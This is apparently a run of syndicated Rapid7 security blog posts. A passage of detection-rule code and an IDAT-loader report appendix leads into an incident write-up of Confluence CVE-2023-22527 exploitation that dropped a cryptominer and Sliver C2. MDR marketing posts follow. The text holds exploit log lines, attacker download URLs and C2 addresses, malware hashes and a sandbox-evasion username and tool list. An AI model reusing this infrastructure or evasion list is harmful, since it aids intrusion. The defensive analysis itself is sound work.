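from typing import Callable, Iterable, List, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    image: str     # full path of the executable that started (assumed field)
    cmdline: str   # command line as recorded by the endpoint sensor (assumed field)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def nltest_enumerate_dcs(ev: ProcessEvent) -> bool:
    """nltest /dclist lists domain controllers; users rarely run it by hand."""
    return _basename(ev.image) == "nltest.exe" and re.search(r"/dclist", ev.cmdline, re.I) is not None


def execution_from_programdata_root(ev: ProcessEvent) -> bool:
    """An executable sitting directly in C:\\ProgramData, not in a vendor subfolder."""
    return re.fullmatch(r"[a-z]:\\programdata\\[^\\]+\.exe", ev.image, re.I) is not None


def explorer_in_nonstandard_location(ev: ProcessEvent) -> bool:
    """explorer.exe legitimately lives in C:\\Windows; any other path is suspect."""
    return _basename(ev.image) == "explorer.exe" and ev.image.lower() != "c:\\windows\\explorer.exe"


_USUAL_PS_SPELLINGS = {"powershell", "powershell.exe", "Powershell", "Powershell.exe",
                       "PowerShell", "PowerShell.exe", "POWERSHELL", "POWERSHELL.EXE"}


def powershell_uncommon_case(ev: ProcessEvent) -> bool:
    """Heuristic: the program token is 'powershell' in a casing nobody types on purpose."""
    token = ev.cmdline.split()[0].strip('"').rsplit("\\", 1)[-1]
    return token.lower() in {"powershell", "powershell.exe"} and token not in _USUAL_PS_SPELLINGS


RULES: List[Tuple[str, Callable[[ProcessEvent], bool]]] = [
    ("Network Discovery - Nltest Enumerate Domain Controllers", nltest_enumerate_dcs),
    ("Suspicious Process - Execution From Root of ProgramData", execution_from_programdata_root),
    ("Suspicious Process - PowerShell Uncommon Upper And Lower Case Combinations", powershell_uncommon_case),
    ("Suspicious Process - explorer.exe in Non-Standard Location", explorer_in_nonstandard_location),
]


def evaluate(events: Iterable[ProcessEvent]) -> List[Tuple[str, str]]:
    """Return (rule name, image path) for every rule each event trips."""
    return [(name, ev.image) for ev in events for name, rule in RULES if rule(ev)]


# Constructed events: four that should alert, three benign look-alikes that should not.
SAMPLE_EVENTS = [
    ProcessEvent("C:\\Windows\\System32\\nltest.exe", "nltest /dclist:corp.example"),
    ProcessEvent("C:\\ProgramData\\update.exe", "\"C:\\ProgramData\\update.exe\" /silent"),
    ProcessEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "pOwErShElL -NoProfile -Command Get-Date"),
    ProcessEvent("C:\\Users\\Public\\explorer.exe", "explorer.exe"),
    ProcessEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcessEvent("C:\\ProgramData\\Vendor\\agent.exe", "agent.exe --service"),
    ProcessEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "powershell.exe -Command Get-Process"),
]

if __name__ == "__main__":
    for rule_name, image in evaluate(SAMPLE_EVENTS):
        print(f"{rule_name}: {image}")
```

The benign look-alikes matter as much as the hits: a vendor subfolder under ProgramData, the real explorer.exe and a normally spelled PowerShell invocation must stay quiet, otherwise the rule is noise rather than signal.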

Appendix A: Known Sandbox Usernames and Analysis Tools

The two columns are independent lists: usernames the loader treats as sandbox accounts, and process names it treats as analysis tools.

Usernames          | Processes
hbyldjtckyn1       | httpdebuggerui.exe
lubi53an14cu       | immunitydebugger.exe
rgzcbuyrznreg      | ksdumperclient.exe
8lnfaai9qdjr       | httpanalyzerstdv7.exe
j6sha37ka          | ida64.exe
keecfmwgj          | 32dbg.exe
pwouqdtdq          | 64dbg.exe
qmis5df7u          | protection_id.exe
txwas1m2t          | vmsrvc.exe
uox1tzamo          | x32dbg.exe
rb5bnfur2          | x64dbg.exe
cm0uegn4do         | x96dbg.exe
douyo8rv71         | prl_cc.exe
paul jones         | windbg.exe
pxmduopvyx         | scylla.exe
fnbdsldtxy         | idau64.exe
gexwjqdjxg         | idaq64.exe
gjam1nxxvm         | idag64.exe
jcotj17dzx         | taskmgr.exe
05kvauqkpqk5       | procexp.exe
64f2tkiqo5k5h      | procmon.exe
of20xqh4vl         | fiddler.exe
harry johnson      | dumpcap.exe
4tgiizslims        | df5serv.exe
bvjchrpnsxn        | ollydbg.exe
kfu0lqwgx5p        | rdpclip.exe
nok4zg7zhof        | vmusrvc.exe
ogjb6gqgk0o5       | qemu-ga.exe
xplyvzr8sgc        | vboxtray.exe
ykj0egq7fze        | vmtoolsd.exe
ryjijkiroms        | pestudio.exe
nzap7ubvas1        | vmacthlp.exe
9yjcpseyimh        | procexp64.exe
uhuqiuwoefu        | wireshark.exe
6o4kyhhjxbir       | prl_tools.exe
7wjlgx7pjlw4       | importrec.exe
8nl0colnq5bq       | vmwaretray.exe
g2dbyldgzz8yo      | vmwareuser.exe
pqonjhvwexsst      | xenservice.exe
rdhj0cnfevzxf      | scylla_x86.exe
xmimmckziitdl      | scylla_x64.exe
l3cnbb8ar5b8       | vboxservice.exe
vzy4jmh0jw02       |
21zlucunfi85       |
sal.rosenburg      |
defaultaccount     |
wdagutilityaccount |

MITRE ATT&CK Techniques

Tactics | Techniques | Details
Initial Access | Drive-by Compromise (T1189) | Threat actors use drive-by downloads to direct browsers to download their initial payloads without the users' consent
Execution | User Execution: Malicious File (T1204.002) | Users execute the binary AppFile_v1.1.exe
Execution | Native API (T1106) | The IDAT injector and IDAT loader use the Heaven’s Gate technique to evade detection
Defense Evasion | Hijack Execution Flow: DLL Search Order Hijacking (T1574.001) | run.exe loads a malicious wbxtrace.dll
Defense Evasion | Process Injection (T1055) | The IDAT injector implements the NtCreateSection + NtMapViewOfSection code injection technique to inject into the cmd.exe process
Defense Evasion | Deobfuscate/Decode Files or Information (T1140) | msidcrl40.dll decrypts dynatron.mdb
Defense Evasion | Process Injection: Process Doppelgänging (T1055.013) | The IDAT loader implements the Process Doppelgänging technique to load the SecTop RAT
Defense Evasion | Masquerading (T1036) | The dynatron.mdb file is masqueraded as a .png file
Defense Evasion | Virtualization/Sandbox Evasion: Time Based Evasion (T1497.003) | Execution delays are performed by several stages throughout the attack flow

IOCs

IOC | SHA256 | Notes
AppFile_v1.1.exe | A3A5E7011335A2284E2D4F73FD464FF129F0C9276878A054C1932BC50608584B | Rust loader responsible for downloading the IDAT Loader
msidcrl40.dll | 02D5E281689EC2D4AB8AC19C93321A09113E5D8FA39380A7021580EA1887B7A5 | Malicious DLL executed by live.exe
dynatron.mdb | C5C52331B208CAD19DC710786E26AC55090FFCA937410D76C53569D731F0BB92 | Encrypted payload decrypted by msidcrl40.dll
vmtools.dll | BEFE0DF365F0E2DC05225470E45FDF03609F098A526D617C478B81AC6BB9147F | Malicious DLL executed by rvm.exe
spank.mpg | E05E561C5118EFDBCA113CA231C527B62E59A4BFFAE3BD374F7B4FCDD10E7D90 | Encrypted payload decrypted by vmtools.dll
hxxps://cdn-network-services-001[.]com/update/minor/1/release.json | | Downloads an additional Rust binary containing the IDAT Loader
152.89.217[.]215 | | SecTop RAT domain
updatenazure[.]com | | BRC4 domain

References

Article | URL
Uncovering the “Serpent” | https://malware.news/t/uncovering-the-serpent/76253
Process Doppelgänging | https://malware.news/t/uncovering-the-serpent/76253
Analysis of “Heaven’s Gate” part 1 | https://sachiel-archangel.medium.com/analysis-of-heavens-gate-part-1-62cca0ace6f0
A Deep Dive Into Malicious Direct Syscall Detection | https://www.paloaltonetworks.com/blog/security-operations/a-deep-dive-into-malicious-direct-syscall-detection/
Fake Update Utilizes New IDAT Loader To Execute StealC and Lumma Infostealers | https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/

RCE to Sliver: IR Tales from the Field

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/02/15/rce-to-sliver-ir-tales-from-the-field/

RCE to Sliver: IR Tales from the Field

*Rapid7 Incident Response consultants Noah Hemker, Tyler Starks, and malware analyst Tom Elkins contributed analysis and insight to this blog.*

Rapid7 Incident Response was engaged to investigate an incident involving unauthorized access to two publicly-facing Confluence servers that were the source of multiple malware executions. Rapid7 identified evidence of exploitation for CVE-2023-22527 within available Confluence logs. During the investigation, Rapid7 identified cryptomining software and a Sliver Command and Control (C2) payload on in-scope servers. Sliver is a modular C2 framework that provides adversarial emulation capabilities for red teams; however, it’s also frequently abused by threat actors. The Sliver payload was used to action subsequent threat actor objectives within the environment. Without proper security tooling to monitor system network traffic and firewall communications, this activity would have progressed undetected leading to further compromise.

Rapid7 customers

Rapid7 consistently monitors emergent threats to identify areas for new detection opportunities. The recent appearance of Sliver C2 malware prompted Rapid7 teams to conduct a thorough analysis of the techniques being utilized and the potential risks. Rapid7 InsightIDR has an alert rule Suspicious Web Request - Possible Atlassian Confluence CVE-2023-22527 Exploitation available for all IDR customers to detect the usage of the text-inline.vm consistent with the exploitation of CVE-2023-22527. A vulnerability check is also available to InsightVM and Nexpose customers. A Velociraptor artifact to hunt for evidence of Confluence CVE-2023-22527 exploitation is available on the Velociraptor Artifact Exchange here. Read Rapid7’s blog on CVE-2023-22527.

Observed Attacker Behavior

Rapid7 IR began the investigation by triaging available forensic artifacts on the two affected publicly-facing Confluence servers. These servers were both running vulnerable Confluence software versions that were abused to obtain Remote Code Execution (RCE) capabilities. Rapid7 reviewed server access logs to identify the presence of suspicious POST requests consistent with known vulnerabilities, including CVE-2023-22527. This vulnerability is a critical OGNL injection vulnerability that abuses the text-inline.vm component of Confluence by sending a modified POST request to the server.

Evidence showed multiple instances of exploitation of this CVE; however, evidence of an embedded command would not be available within the standard header information logged in access logs. A packet capture (PCAP) was not available for review to identify embedded commands, but the identified POST requests are consistent with exploitation of the CVE.
The following are a few examples of the exploitation of the Confluence CVE found within access logs:

Access.log Entry
POST /template/aui/text-inline.vm HTTP/1.0 200 5961ms 7753 – Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
POST /template/aui/text-inline.vm HTTP/1.0 200 70ms 7750 – Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
POST /template/aui/text-inline.vm HTTP/1.0 200 247ms 7749 – Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0

Evidence showed the execution of a curl command post-exploitation of the CVE resulting in the dropping of cryptomining malware to the system. The IP addresses associated with the malicious POST requests to the Confluence servers matched the IP addresses of the identified curl command. This indicates that the dropped cryptomining malware was directly tied to Confluence CVE exploitation.
As a result of the executed curl command, file w.sh was written to the /tmp/ directory on the system. This file is a bash script used to enumerate the operating system, download cryptomining installation files, and then execute the cryptomining binary. The bash script then executed the wget command to download javs.tar.gz from the IP address 38.6.173[.]11 over port 80. This file was identified to be the XMRigCC cryptomining malware which caused a spike in system resource utilization consistent with cryptomining activity. Service javasgs_miner.service was created on the system and set to run as root to ensure persistence.
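The correlation described above (a POST to text-inline.vm from an IP address that shortly afterwards sends a request carrying curl) is the log-based IOC listed at the end of this write-up. As an added example, not Rapid7's detection logic, here is a small hunt that applies it to access-log lines. The log lines are constructed in a common-log-style shape with documentation IP addresses; real Confluence access logs are laid out differently, so the line regex and the five-minute window are assumptions to adapt.

```python
# Added example (not Rapid7's tooling): pair text-inline.vm POSTs with a
# follow-on curl request from the same source IP. Log lines are constructed.
import re
from datetime import datetime, timedelta
from typing import Dict, Iterator, List, Tuple

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
EXPLOIT_PATH = "/template/aui/text-inline.vm"

# Constructed sample: one exploit+curl chain, one lone POST, one unrelated curl.
SAMPLE_LOG = """\
203.0.113.10 - - [15/Jan/2024:10:01:02 +0000] "POST /template/aui/text-inline.vm HTTP/1.0" 200 7753 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36"
203.0.113.10 - - [15/Jan/2024:10:01:05 +0000] "GET /rest/api/content HTTP/1.1" 200 512 "-" "curl/7.88.1"
198.51.100.7 - - [15/Jan/2024:10:02:00 +0000] "POST /template/aui/text-inline.vm HTTP/1.0" 200 7750 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)"
198.51.100.7 - - [15/Jan/2024:10:30:00 +0000] "GET /login.action HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.44 - - [15/Jan/2024:10:03:00 +0000] "GET /dashboard.action HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
192.0.2.44 - - [15/Jan/2024:10:03:09 +0000] "GET /rest/api/space HTTP/1.1" 200 100 "-" "curl/8.0.1"
"""


def parse(log_text: str) -> Iterator[dict]:
    """Yield one dict per parseable line; unparseable lines are skipped, not fatal."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        yield rec


def text_inline_posts(log_text: str) -> Dict[str, int]:
    """Count POSTs to the vulnerable template per source IP (the raw IOC)."""
    counts: Dict[str, int] = {}
    for rec in parse(log_text):
        if rec["method"] == "POST" and rec["path"] == EXPLOIT_PATH:
            counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return counts


def find_exploit_chains(log_text: str, window_seconds: int = 300) -> List[Tuple[str, str, str]]:
    """Return (ip, follow-on path, follow-on user agent) wherever a text-inline.vm
    POST is followed within the window by a request from the same IP mentioning curl."""
    last_post: Dict[str, datetime] = {}
    chains: List[Tuple[str, str, str]] = []
    for rec in parse(log_text):
        if rec["method"] == "POST" and rec["path"] == EXPLOIT_PATH:
            last_post[rec["ip"]] = rec["ts"]
            continue
        seen = last_post.get(rec["ip"])
        if seen is None or rec["ts"] - seen > timedelta(seconds=window_seconds):
            continue
        if "curl" in (rec["path"] + " " + rec["ua"]).lower():
            chains.append((rec["ip"], rec["path"], rec["ua"]))
    return chains


if __name__ == "__main__":
    print("text-inline POSTs by IP:", text_inline_posts(SAMPLE_LOG))
    print("exploit -> curl chains:", find_exploit_chains(SAMPLE_LOG))
```

Counting the POSTs separately from the chains is deliberate: the POST alone is worth an alert (the write-up notes the embedded command never reaches the access log), while the curl follow-up is the stronger signal that the exploitation produced a download.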

The following is a snippet of code contained within w.sh defining communication parameters for the downloading and execution of the XMRigCC binary.

[Image: snippet of w.sh showing the download and execution parameters for the XMRigCC binary]

Rapid7 found additional log evidence within Catalina.log that references the download of the above file inside of an HTTP response header. This response registered as ‘invalid’ as it contained characters that could not be accurately interpreted. Evidence confirmed the successful download and execution of the XMRigCC miner, so the above Catalina log may prove useful for analysts to identify additional proof of attempted or successful exploitation.

Catalina Log Entry
WARNING [http-nio-8090-exec-239 url: /rest/table-filter/1.0/service/license; user: Redacted ] org.apache.coyote.http11.Http11Processor.prepareResponse The HTTP response header [X-Cmd-Response] with value [http://38.6.173.11/xmrigCC-3.4.0-linux-generic-static-amd64.tar.gz xmrigCC-3.4.0-linux-generic-static-amd64.tar.gz… ] has been removed from the response because it is invalid

Rapid7 then shifted focus to a review of system network connections on both servers. Evidence showed an active connection from both servers to the known-abused IP address 193.29.13[.]179 over port 8888. The netstat command output showed that the network connection’s source program was called X-org and was located in the system’s /tmp directory. According to firewall logs, the first identified communication from this server to the malicious IP address aligned with the timestamp of the X-org file creation. Rapid7 identified another malicious file residing on the secondary server, named X0. Both files shared the same SHA256 hash, indicating that they are the same binary. The hash for these files is provided below in the IOCs section.

A review of firewall logs provided a comprehensive view of the communications between affected systems and the malicious IP address. Firewall logs filtered on traffic between the compromised servers and the malicious IP address showed inbound and outbound data transfers consistent with known C2 behavior. Rapid7 decoded and debugged the Sliver payload to extract any available Indicators of Compromise (IOCs). Within the Sliver payload, Rapid7 confirmed the following IP address 193.29.13[.]179 would communicate over port 8888 using the mTLS authentication protocol.
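The network-connection review described above (an established connection whose owning binary lives in /tmp) is a check worth scripting for every host in scope. As an added example, not Rapid7's tooling, here is a small triage helper that parses netstat output and flags established connections owned by a process running from a world-writable staging directory. The netstat text and the PID-to-executable map (what readlink on /proc/<pid>/exe would return) are constructed, with documentation IP addresses; only the X-org file name comes from the write-up.

```python
# Added example (illustrative, not Rapid7's tooling): flag ESTABLISHED TCP
# connections whose owning process runs from /tmp, /var/tmp or /dev/shm.
import re
from typing import Dict, Iterator, List, Tuple

SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed `netstat -tnp` output (addresses are documentation ranges).
SAMPLE_NETSTAT = """\
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 10.0.0.5:8090           10.0.0.20:51234         ESTABLISHED 1201/java
tcp        0      0 10.0.0.5:53122          10.0.0.9:5432           ESTABLISHED 1201/java
tcp        0      0 10.0.0.5:41922          203.0.113.50:8888       ESTABLISHED 4410/X-org
tcp        0      0 10.0.0.5:41930          198.51.100.9:443        TIME_WAIT   -
"""

# Constructed PID -> executable path map, as `readlink /proc/<pid>/exe` would give it.
SAMPLE_EXE_BY_PID: Dict[int, str] = {
    1201: "/opt/atlassian/confluence/jre/bin/java",
    4410: "/tmp/X-org",
}

NETSTAT_RE = re.compile(
    r"^tcp6?\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+(?P<state>\S+)\s+(?P<pid>\d+)/(?P<prog>\S+)"
)


def parse_netstat(text: str) -> Iterator[dict]:
    """Yield one dict per TCP row that has an owning PID (rows with '-' are skipped)."""
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            row = m.groupdict()
            row["pid"] = int(row["pid"])
            yield row


def find_connections_from_staging_dirs(netstat_text: str,
                                       exe_by_pid: Dict[int, str]) -> List[Tuple[int, str, str, str]]:
    """Return (pid, program name, exe path, remote endpoint) for every ESTABLISHED
    connection whose owning binary lives under one of SUSPECT_DIRS."""
    hits: List[Tuple[int, str, str, str]] = []
    for conn in parse_netstat(netstat_text):
        if conn["state"] != "ESTABLISHED":
            continue
        exe = exe_by_pid.get(conn["pid"], "")
        if exe.startswith(SUSPECT_DIRS):
            hits.append((conn["pid"], conn["prog"], exe, conn["remote"]))
    return hits


if __name__ == "__main__":
    for pid, prog, exe, remote in find_connections_from_staging_dirs(SAMPLE_NETSTAT, SAMPLE_EXE_BY_PID):
        print(f"pid {pid} ({prog}) at {exe} -> {remote}")
```

Resolving the PID to the real executable path rather than trusting the program-name column matters: the name netstat prints is whatever the process calls itself, while /proc/<pid>/exe shows where the binary actually lives.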

[Image: decoded Sliver payload configuration showing the C2 address, port 8888 and mTLS]

After Sliver first communicated with the established C2, it checked the username associated with the current session on the local system, read /etc/passwd and /etc/machine-id, and then communicated with the C2 again. The contents of passwd and machine-id provide system information such as the hostname and the accounts on the system. Cached credentials from the system were discovered to be associated with outbound C2 traffic, further supporting this credential access. This activity is consistent with the standard capabilities available within the GitHub release of Sliver hosted here.

The Sliver C2 connection was later used to execute wget commands that downloaded Kerbrute, Traitor, and Fscan to the servers. Kerbrute was executed from /dev/shm and is commonly used to brute-force and enumerate valid Active Directory accounts through Kerberos pre-authentication. The Traitor binary was executed from the /var/tmp directory and contains functionality to leverage Pwnkit and Dirty Pipe, as seen within evidence on the system. Fscan was executed from the /var/tmp directory with the file name f and performed scanning to enumerate systems present within the environment. Rapid7 performed containment actions to deny any further threat actor activity. No additional post-exploitation objectives were identified within the environment.

Mitigation guidance

To mitigate the attacker behavior outlined in this blog, the following mitigation techniques should be considered:

  • Ensure that unnecessary ports and services are disabled on publicly-facing servers.

  • All publicly-facing servers should regularly be patched and remain up-to-date with the most recent software releases.

  • Environment firewall logs should be aggregated into a centralized security solution to allow for the detection of abnormal network communications.

  • Firewall rules should be implemented to deny inbound and outbound traffic from unapproved geolocations.

  • Publicly-facing servers hosting web applications should implement a restricted shell, where possible, to limit the capabilities and scope of commands available when compared to a standard bash shell.

MITRE ATT&CK Techniques

Tactics | Techniques | Details
Command and Control | Application Layer Protocol (T1071) | Sliver C2 connection
Discovery | Domain Account Discovery (T1087) | Kerbrute enumeration of Active Directory
Reconnaissance | Active Scanning (T1595) | Fscan enumeration
Privilege Escalation | Setuid and Setgid (T1548.001) | Traitor privilege escalation
Execution | Unix Shell (T1059.004) | The Sliver payload and follow-on command executions
Credential Access | Brute Force (T1110) | Kerbrute Active Directory brute force component
Credential Access | OS Credential Dumping (T1003.008) | Extracting the contents of the /etc/passwd file
Impact | Resource Hijacking (T1496) | Execution of cryptomining software
Initial Access | Exploit Public-Facing Application (T1190) | Evidence of text-inline abuse within Confluence logs

Indicators of Compromise

Attribute | Value | Description
Filename and Path | /dev/shm/traitor-amd64 | Privilege escalation binary
SHA256 | fdfbfc07248c3359d9f1f536a406d4268f01ed63a856bd6cef9dccb3cf4f2376 | Hash for Traitor binary
Filename and Path | /var/tmp/kerbrute_linux_amd64 | Kerbrute enumeration of Active Directory
SHA256 | 710a9d2653c8bd3689e451778dab9daec0de4c4c75f900788ccf23ef254b122a | Hash for Kerbrute binary
Filename and Path | /var/tmp/f | Fscan enumeration
SHA256 | b26458a0b60f4af597433fb7eff7b949ca96e59330f4e4bb85005e8bbcfa4f59 | Hash for Fscan binary
Filename and Path | /tmp/X0 | Sliver binary
SHA256 | 29bd4fa1fcf4e28816c59f9f6a248bedd7b9867a88350618115efb0ca867d736 | Hash for Sliver binary
Filename and Path | /tmp/X-org | Sliver binary
SHA256 | 29bd4fa1fcf4e28816c59f9f6a248bedd7b9867a88350618115efb0ca867d736 | Hash for Sliver binary
IP Address | 193.29.13.179 | Sliver C2 IP address
Filename and Path | /tmp/w.sh | Bash script for XMRigCC cryptominer
SHA256 | 8d7c5ab5b2cf475a0d94c2c7d82e1bbd8b506c9c80d5c991763ba6f61f1558b0 | Hash for bash script
Filename and Path | /tmp/javs.tar.gz | Compressed cryptominer installation files
SHA256 | ef7c24494224a7f0c528edf7b27c942d18933d0fc775222dd5fffd8b6256736b | Hash for cryptominer installation files
Log-Based IOC | "POST /template/aui/text-inline.vm HTTP/1.0 200" followed by a GET request containing curl | Exploit behavior within Confluence access.log
IP Address | 195.80.148.18 | IP address associated with exploit behavior of text-inline followed by curl
IP Address | 103.159.133.23 | IP address associated with exploit behavior of text-inline followed by curl

Attackers are Working Around The Clock. Luckily, So Are We.

Post Syndicated from Margaret Wei original https://blog.rapid7.com/2023/11/30/attackers-are-working-around-the-clock-luckily-so-are-we/

Attackers are Working Around The Clock. Luckily, So Are We.

It takes an average of 204 days for organizations to discover a breach, and from there an average of 73 days to contain it. With the average cost of a breach at an all-time high of $4.45 million, there’s an undeniable need for teams to enlist the right experts to quickly eradicate threats.

At Rapid7, our expert SOC analysts detect and respond to threats end-to-end for MDR customers – no matter how large or complex. Rapid7’s Active Response, powered by InsightConnect SOAR Automation, enables our analysts to contain endpoints and users on your behalf within minutes of when a threat is identified, reducing attacker dwell time and keeping your organization safe from the damaging consequences of an attack.

24×7 Immediate Containment of Validated Threats with Active Response

Initially launched in 2020, we’ve now expanded Active Response to include broader asset quarantine support across third-party providers — including Crowdstrike, SentinelOne, Carbon Black Cloud, and more — as well as more transparency into MDR analyst activity to bring you more expansive, collaborative detection and response. What you can expect with Active Response:

  • Rapid7 MDR analysts will contain compromised endpoints or users as early in the killchain as possible to keep your organization safe from threats including malware, lateral movement, data exfiltration attempts, and more. We’ve also added a cloud-enabled option for actions to quarantine assets — removing the need for any on-prem components and making containment even faster for your organization.
  • Our team takes action on your behalf when we see a validated threat, but you have control of the parameters with the ability to create containment guardrails to prohibit the containment of critical servers, users, or devices. You always have the option to unquarantine assets or users directly from InsightIDR, making it extremely straightforward and keeping the power in your hands.
  • Rapid7’s coverage doesn’t stop there — with recommended additional actions for containment, remediation, and mitigation, our analysts ensure your organization is as secure as possible.

See How Active Response Stopped Malware in a Recent Rapid7 MDR Investigation

The following is a real-world example of a threat handled by our MDR analysts leveraging Active Response to quarantine an asset and stop malware.

Attacker Activity

  • [USER 1], working on legal cases, used the Chrome browser to visit a legitimate website compromised by malicious embedded JavaScript functions.
  • The embedded JavaScript file loaded a pop-up inviting the user to update their browser by downloading a ZIP archive containing a JavaScript file.
  • Once executed, the JavaScript file communicated with Command and Control (C2) to download and execute a malicious payload, which fingerprinted the asset, user, cached passwords, domain controllers, and trusted domains and wrote the results to a file at the root of [USER 1]’s %temp% directory to stage the host for subsequent exploitation.

Build Resilience While You Sleep

Active Response enables teams to immediately quarantine malicious behavior before it can compromise a system, saving teams from the damaging outcomes of a successful security breach as well as costly ransomware, loss of data, and broken customer trust.

Whether it’s an intrusion attempt, suspicious process start activity, or anything in between, Rapid7’s SOC has their eyes on your environment 24x7x365, halting suspicious activity in its tracks so you can sleep peacefully through the night.

To learn more about Active Response, talk to your Customer Advisor or a representative.

When Maximum Effort Doesn’t Equate to Maximum Results

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/11/21/when-maximum-effort-doesnt-equate-to-maximum-results/

When Maximum Effort Doesn't Equate to Maximum Results

It’s no secret that security teams are feeling beleaguered as a result of the barrage of data, events, and alerts generated by their security tools, to say nothing of the increased budget scrutiny and constrained staff resources that continue to plague cybersecurity practitioners.

The trick is finding the right balance between how much internal teams have to accomplish themselves versus how much they can cede to managed security service providers (MSSPs).

Historically, success in security operations (SecOps) was measured by how quickly teams could react to incoming threats; but the sheer number of alerts that require humans-in-the-loop to determine the accuracy and severity of security events makes it nearly impossible for teams to keep up. Additionally, the number of tools deployed in a given organization today – to say nothing of the complexity required to make those tools work in concert – means reacting alone won’t get the job done anyway.

Unfortunately, many MSSPs don’t do enough to relieve customers of noisy alerts without expensive consulting agreements, which puts the burden to evaluate and remediate incidents back on already strapped in-house teams.

Traditional approaches have the added disadvantages of being too siloed, too slow, too antiquated for cloud environments, and too convoluted to demonstrate their value. Analysts at a leading research firm predict that within the next 12-18 months, 33% of organizations that currently have internal security functions will attempt and fail to build an effective internal SecOps because of resource constraints such as lack of budget, expertise, and staffing. Analysts further expect that within the next 12-18 months, 90% of internal SecOps will outsource at least 50% of their operational workloads – which makes choosing an MSSP you trust of paramount importance.

MSSPs enable organizations to maximize resilience while minimizing complexity and optimizing staff resources. The best solutions in the market will drive greater efficiency and consolidation by unifying vulnerability management and managed detection and response (MDR) into a single, cohesive security service built by practitioners for practitioners. They will offer 24x7x365 services that “follow the sun” (meaning no one service center is responsible for 100% of support calls; the work is distributed in certified centers of excellence around the world) so that top-notch support is readily available where and when you need it. Complete coverage and end-to-end detection and response services means you can feel confident that your teams are always ready for what comes next.

But it’s important to choose an MSSP that eschews a one-size-fits-all approach. Rather, look for a partner that is dynamic and flexible enough to meet the particular risk profile and business priorities of your organization, one adaptable enough to conform to changes in evolving threats and attack vectors.

Partnering with the right MSSP also allows you to optimize your SecOps for today’s distributed environments, built for the speed and scale of the cloud. Operating in the cloud means you can integrate hundreds of services with the thousands of devices connecting to them seamlessly and in real time; it also means you must protect and secure a sprawling surface with a multitude of potential entry points that threat actors can exploit.

To meet the challenge, choose an MSSP that offers complete coverage from a single, end-to-end solution so that you’re not left responding to an overabundance of events, alerts, and false positives or trying to protect an attack surface too big to contain.

Look for providers that deliver unlimited data, unlimited incident response, and unlimited intelligence so that when a forensic analysis is performed, their detailed remediation and mitigation recommendations make sure you can improve your resilience against future threats. And in the unfortunate event that a breach becomes a full-scope incident-response engagement, you want a partner that will work with you round-the-clock on the forensic investigation and deliver answers that will remove attackers from your environment as quickly as possible – without charging additional consulting fees.

Partnering with a proven MSSP will also boost your visibility across all services and devices to anticipate the most imminent risks, prevent attacks earlier, and respond to events faster. Additionally, an engagement that includes threat exposure manageability at scale through unified endpoint-to-cloud coverage can identify and respond to threats anywhere while breaking down functional and geographic silos that stall efficiency and reduce collaboration.

Critical functions like threat hunting and patch management can be automated across many tools and processes to reduce reliance on manual work. Machine learning and artificial intelligence models can be paired with internal threat telemetry data and chatbots to triage events, increase staff productivity, or produce threat reports that support more targeted and prioritized threat management across the enterprise.

Best of all, the successful use of AI and automation can help reduce the number of tools operating in your environment, which in turn decreases the complexity and cost of security operations.

It’s time to gain the edge over attackers and keep up with the fluid, ever-expanding threat landscape by eliminating threats wherever they emerge and proactively preventing breaches earlier in the kill chain. Partnering with a trusted MSSP will enable you to manage your threat exposure precisely and comprehensively, improve your signal-to-noise ratio, demonstrate tangible ROI from your security investments, and continually advance your security posture.

Learn more about the best criteria to use when reviewing the capabilities of potential MSSP partners.

Proactively Prevent Breaches with Expanded Endpoint Protection in Rapid7 MDR

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/10/02/proactively-prevent-breaches-with-expanded-endpoint-protection-in-rapid7-mdr/

Proactively Prevent Breaches with Expanded Endpoint Protection in Rapid7 MDR

Working with thousands of security and risk professionals across the globe, we know that complexity is the top challenge SOCs are facing today. As the attack surface rapidly expands, security teams need more effective ways to keep pace with digital transformation and get out of the cycle of constant reactive fire drills.

So, we have expanded endpoint protection within our leading MDR service, Managed Threat Complete, to include native next-generation antivirus (NGAV) and DFIR powered by our universal Insight Agent.

Building on the powerful vulnerability scanning, high efficacy threat detections, and rapid containment we deliver on the endpoint today, these new capabilities help unlock critical efficiency and consolidation teams need to gain control over their dynamic attack surface.

We’re also excited to integrate Velociraptor directly into InsightIDR. The integration empowers security teams to easily collect, query, and monitor virtually any aspect of their endpoint fleets with leading digital forensics and incident response (DFIR) technology and playbooks. Already a key tool used by our Incident Response consultants in every single Incident Response engagement, customers can now experience the power and insight Velociraptor brings on the endpoint, directly in the product.

Plus, Velociraptor now uses an expressive query language (rather than code), which makes it faster and easier to share custom detections with the open source community. This helps SOC teams root out new threats more quickly, while demonstrating our continued support to open source.

